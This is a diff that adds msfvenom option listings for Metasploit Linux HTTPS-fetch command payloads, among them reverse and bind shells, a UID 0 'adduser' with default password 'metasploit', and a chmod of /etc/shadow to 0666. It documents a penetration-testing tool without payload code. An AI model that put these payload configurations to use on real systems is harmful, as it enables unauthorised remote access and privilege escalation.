0000000..2c34971 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_bind_tcp_random_port.txt @@ -0,0 +1,75 @@ + + Name: HTTPS Fetch, Linux Command Shell, Bind TCP Random Port Inline + Module: payload/cmd/linux/https/x64/shell_bind_tcp_random_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wilUXoDEki no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + + Listen for a connection in a random port and spawn a command shell. + Use nmap to discover the open port: 'nmap -sS target -p-'. + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_find_port.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_find_port.txt new file mode 100644 index 0000000..8799789 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_find_port.txt @@ -0,0 +1,78 @@ + + Name: HTTPS Fetch, Linux Command Shell, Find Port Inline + Module: payload/cmd/linux/https/x64/shell_find_port + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 91 + Rank: Normal + +Provided by: + Brendan Watters + mak + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CPORT 3918 no The local client port +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME LOFhsXLOKQQ no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Spawn a shell on an established connection + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_ipv6_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_ipv6_tcp.txt new file mode 100644 index 0000000..6824869 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_ipv6_tcp.txt @@ -0,0 +1,87 @@ + + Name: HTTPS Fetch, Linux x64 Command Shell, Reverse TCP Inline (IPv6) + Module: payload/cmd/linux/https/x64/shell_reverse_ipv6_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + epi + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port +SCOPEID 0 no IPv6 scope ID, for link-local addresses + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ORLscikuqX no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to attacker and spawn a command shell over IPv6 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_tcp.txt b/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_tcp.txt new file mode 100644 index 0000000..461de30 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x64-shell_reverse_tcp.txt @@ -0,0 +1,86 @@ + + Name: HTTPS Fetch, Linux Command Shell, Reverse TCP Inline + Module: payload/cmd/linux/https/x64/shell_reverse_tcp + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 110 + Rank: Normal + +Provided by: + Brendan Watters + ricky + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST no Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +LHOST yes The listen address (an interface may be specified) +LPORT 4444 yes The listen port + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jjtTZYmzyl no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x64 payload from an HTTPS server. + Connect back to attacker and spawn a command shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AutoRunScript no A script to run automatically on session creation. + AutoVerifySession true yes Automatically verify and drop invalid sessions + CommandShellCleanupCommand no A command to run before the session is closed + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + InitialAutoRunScript no An initial script to run on session creation (before AutoRunScript) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + ReverseAllowProxy false yes Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST + ReverseListenerBindAddress no The specific IP address to bind to on the local system + ReverseListenerBindPort no The port to bind to on the local system if different from LPORT + ReverseListenerComm no The specific communication channel to use for this listener + ReverseListenerThreaded false yes Handle every connection in a new thread (experimental) + StagerRetryCount 10 no The number of times the stager should retry if the first connect fails + StagerRetryWait 5 no Number of seconds to wait for the stager between reconnect attempts + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-adduser.txt b/msfvenom/payload_options/cmd-linux-https-x86-adduser.txt new file mode 100644 index 0000000..934e40b --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-adduser.txt @@ -0,0 +1,84 @@ + + Name: HTTPS Fetch, Linux Add User + Module: payload/cmd/linux/https/x86/adduser + Platform: Linux + Arch: cmd +Needs Admin: Yes + Total size: 113 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + skape + vlad902 + spoonm + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +PASS metasploit yes The password for this user +SHELL /bin/sh no The shell for this user +USER metasploit yes The username to create + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME wIQvQlJZaTn no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Create a new user with UID 0 + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-chmod.txt b/msfvenom/payload_options/cmd-linux-https-x86-chmod.txt new file mode 100644 index 0000000..49d0bff --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-chmod.txt @@ -0,0 +1,81 @@ + + Name: HTTPS Fetch, Linux Chmod + Module: payload/cmd/linux/https/x86/chmod + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + kris katterjohn + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload +FILE /etc/shadow yes Filename to chmod +MODE 0666 yes File mode (octal) + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME sQcMyRrFh no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Runs chmod on specified file with specified mode + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-exec.txt b/msfvenom/payload_options/cmd-linux-https-x86-exec.txt new file mode 100644 index 0000000..19913c9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-exec.txt @@ -0,0 +1,82 @@ + + Name: HTTPS Fetch, Linux Execute Command + Module: payload/cmd/linux/https/x86/exec + Platform: Linux + Arch: cmd +Needs Admin: No + Total size: 116 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + vlad902 + Geyslan G. Bem + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +CMD no The command string to execute +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME jHeMvyolmxGx no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Execute an arbitrary command or just a /bin/sh shell + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + AppendExit false no Prepend a stub that will break out of a chroot (includes setreuid to root) + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + NullFreeVersion false yes Null-free shellcode version + PrependChrootBreak false no Prepend a stub that will break out of a chroot (includes setreuid to root) + PrependFork false no Prepend a stub that starts the payload in its own process via fork + PrependSetgid false no Prepend a stub that executes the setgid(0) system call + PrependSetregid false no Prepend a stub that executes the setregid(0, 0) system call + PrependSetresgid false no Prepend a stub that executes the setresgid(0, 0, 0) system call + PrependSetresuid false no Prepend a stub that executes the setresuid(0, 0, 0) system call + PrependSetreuid false no Prepend a stub that executes the setreuid(0, 0) system call + PrependSetuid false no Prepend a stub that executes the setuid(0) system call + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-generic-debug_trap.txt b/msfvenom/payload_options/cmd-linux-https-x86-generic-debug_trap.txt new file mode 100644 index 0000000..a1001d9 --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-generic-debug_trap.txt @@ -0,0 +1,70 @@ + + Name: HTTPS Fetch, Generic x86 Debug Trap + Module: payload/cmd/linux/https/x86/generic/debug_trap + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 104 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + robert + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to delete the binary after execution +FETCH_FILELESS none yes Attempt to run payload without touching disk by using anonymous handles, requires Linux ≥3.17 (for Python variant also Python ≥3.8 (Accepted: none, bash, python3.8+) +FETCH_SRVHOST yes Local IP to use for serving payload +FETCH_SRVPORT 8080 yes Local port to use for serving payload +FETCH_URIPATH no Local URI to use for serving payload + + +When FETCH_COMMAND is one of CURL,WGET: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_PIPE false yes Host both the binary payload and the command so it can be piped directly to the shell. + + +When FETCH_FILELESS is none: + +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_FILENAME ZwJuscRF no Name to use on remote system when storing payload; cannot contain spaces or slashes +FETCH_WRITABLE_DIR ./ yes Remote writable dir to store payload; cannot contain spaces + +Description: + Fetch and execute an x86 payload from an HTTPS server. + Generate a debug trap in the target process + + + Name Current Setting Required Description + ---- --------------- -------- ----------- + EXE::Custom no Use custom exe instead of automatically generating a payload exe + EXE::EICAR false no Generate an EICAR file instead of regular payload exe + EXE::FallBack false no Use the default template in case the specified one is missing + EXE::Inject false no Set to preserve the original EXE function + EXE::OldMethod false no Set to use the substitution EXE generation method. + EXE::Path no The directory in which to look for the executable template + EXE::Template no The executable template file name. + FetchHandlerDisable false yes Disable fetch handler + FetchHttpServerName Apache yes Fetch HTTP server name + FetchListenerBindAddress no The specific IP address to bind to to serve the payload if different from FETCH_SRVHOST + FetchListenerBindPort no The port to bind to if different from FETCH_SRVPORT + FetchSSLCert no Path to a custom SSL certificate (default is randomly generated) + FetchSSLCipher no String for SSL cipher spec - "DHE-RSA-AES256-SHA" or "ADH" + FetchSSLCompression false no Enable SSL/TLS-level compression + FetchSSLVersion Auto yes Specify the version of SSL/TLS to be used (Auto, TLS and SSL23 are auto-negotiate) (Accepted: Auto, TLS, SSL23, SSL3, TLS1, TLS1.1, TLS1.2) + MSI::Custom no Use custom msi instead of automatically generating a payload msi + MSI::EICAR false no Generate an EICAR file instead of regular payload msi + MSI::Path no The directory in which to look for the msi template + MSI::Template no The msi template file name + MSI::UAC false no Create an MSI with a UAC prompt (elevation to SYSTEM if accepted) + VERBOSE false no Enable detailed status messages + WORKSPACE no Specify the workspace for this module + diff --git a/msfvenom/payload_options/cmd-linux-https-x86-generic-tight_loop.txt b/msfvenom/payload_options/cmd-linux-https-x86-generic-tight_loop.txt new file mode 100644 index 0000000..3891f8e --- /dev/null +++ b/msfvenom/payload_options/cmd-linux-https-x86-generic-tight_loop.txt @@ -0,0 +1,70 @@ + + Name: HTTPS Fetch, Generic x86 Tight Loop + Module: payload/cmd/linux/https/x86/generic/tight_loop + Platform: Linux, BSD, BSDi, OSX, Solaris, Windows + Arch: cmd +Needs Admin: No + Total size: 107 + Rank: Normal + +Provided by: + Brendan Watters + Spencer McIntyre + jduck + +Basic options: +Name Current Setting Required Description +---- --------------- -------- ----------- +FETCH_CHECK_CERT false yes Check SSL certificate +FETCH_COMMAND CURL yes Command to fetch payload (Accepted: CURL, FTP, TFTP, TNFTP, WGET) +FETCH_DELETE false yes Attempt to 